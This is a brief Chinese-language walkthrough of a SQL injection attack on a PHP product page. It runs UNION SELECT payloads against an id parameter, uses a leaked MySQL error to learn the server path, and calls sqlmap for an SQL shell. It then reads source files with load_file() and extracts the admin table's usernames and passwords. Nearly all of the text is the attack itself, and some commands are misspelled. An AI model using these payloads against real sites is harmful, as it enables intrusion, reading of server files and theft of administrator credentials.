order by 20
www. .com/product/introduction.php?id=-65 UNION SELECT user(),2
www. .com/product/introduction.php?id=-65 UNION SELECT @@versions,2
报错
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/webroot/cw/product/introduction.php on line 71
使用sqlmap 将/home/webroot/cw/product/introduction.php带入
sqlmap -u "" --sql-sehll
select load_file('/home/webroot/cw/product/introduction.php') 查看introduction.php的源码
依次类推,可以找出更多的文件路径
找出管理登录目录
select load_file('/home/webroot/cw/check.php')
查找管理员表,列
select user,pwd from admin;